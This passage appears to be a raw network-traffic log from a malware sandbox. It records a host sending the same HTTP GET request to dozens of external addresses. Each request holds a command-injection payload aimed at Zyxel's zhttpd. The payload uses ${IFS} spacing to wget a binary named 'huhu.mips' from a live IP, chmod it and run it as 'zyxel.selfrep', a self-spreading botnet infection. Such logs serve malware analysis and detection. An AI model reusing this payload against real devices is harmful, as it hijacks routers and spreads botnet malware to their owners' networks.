                                                  Jan 19, 2024 18:23:47.890616894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2473192.168.2.1350356162.108.120.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890674114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2474192.168.2.134038858.78.108.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890707016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2475192.168.2.1337222137.51.244.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890759945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2476192.168.2.1353164219.16.190.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890806913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2477192.168.2.1332912202.20.105.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890871048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2478192.168.2.135461098.13.8.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890894890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2479192.168.2.134141435.131.108.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890929937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2480192.168.2.1355194129.139.206.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890958071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2481192.168.2.1360306129.32.181.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891002893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2482192.168.2.1347208193.25.30.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891038895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2483192.168.2.133794644.79.134.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891092062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2484192.168.2.1342746115.119.139.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891122103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2485192.168.2.1340812189.39.144.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891156912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2486192.168.2.135913635.5.187.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891213894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2487192.168.2.134352664.31.49.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891258001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2488192.168.2.1347304218.253.218.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891303062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2489192.168.2.1345546133.47.8.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891329050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2490192.168.2.1341158180.124.107.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891366005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2491192.168.2.135157248.191.71.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891401052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2492192.168.2.134898812.22.31.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891453028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2493192.168.2.1348540114.146.222.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891486883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2494192.168.2.134291270.114.164.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891536951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2495192.168.2.1351210180.131.86.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891586065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2496192.168.2.1348036201.131.232.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891609907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2497192.168.2.1353832219.143.163.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891673088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2498192.168.2.1346542194.136.68.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891704082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2499192.168.2.133280493.90.45.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891748905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2500192.168.2.1347872155.94.46.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891803980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2501192.168.2.135297694.134.211.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891832113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2502192.168.2.1345892199.226.5.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891880989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2503192.168.2.1333872111.77.36.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891911983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2504192.168.2.1341508175.113.223.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.891963005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2505192.168.2.1349136187.51.90.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892010927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2506192.168.2.1356000186.226.39.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892055988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2507192.168.2.135480877.92.76.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892101049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2508192.168.2.133598657.245.205.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892173052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2509192.168.2.1345464123.73.157.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892204046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2510192.168.2.134640436.184.226.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892241001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2511192.168.2.1346858193.36.85.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892277002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2512192.168.2.1348752187.47.19.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892326117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2513192.168.2.1351590101.26.118.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892359018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2514192.168.2.1337286135.2.185.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892409086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2515192.168.2.135436885.234.2.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892452955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2516192.168.2.1350496129.129.132.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892486095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2517192.168.2.1354126177.78.91.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892525911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2518192.168.2.1358458129.186.129.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892570019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2519192.168.2.1356984165.103.230.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892620087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2520192.168.2.1340932162.3.24.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892633915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2521192.168.2.1333888170.181.252.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892688990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2522192.168.2.1349618157.248.52.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892719030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2523192.168.2.1337058191.144.157.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892775059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2524192.168.2.1354028179.31.72.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892823935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2525192.168.2.1353378158.219.187.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892863989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2526192.168.2.13357649.208.180.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892913103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2527192.168.2.133365864.210.36.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892932892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2528192.168.2.133799665.208.194.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.892963886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2529192.168.2.133406854.159.222.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893003941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2530192.168.2.133522277.157.0.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893052101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2531192.168.2.1333068123.182.67.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893095970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2532192.168.2.135280093.217.129.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893129110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2533192.168.2.1355228186.54.137.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893167973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2534192.168.2.135198614.152.20.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893208981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2535192.168.2.135619839.123.206.163443
                                                  TimestampBytes transferredDirectionData
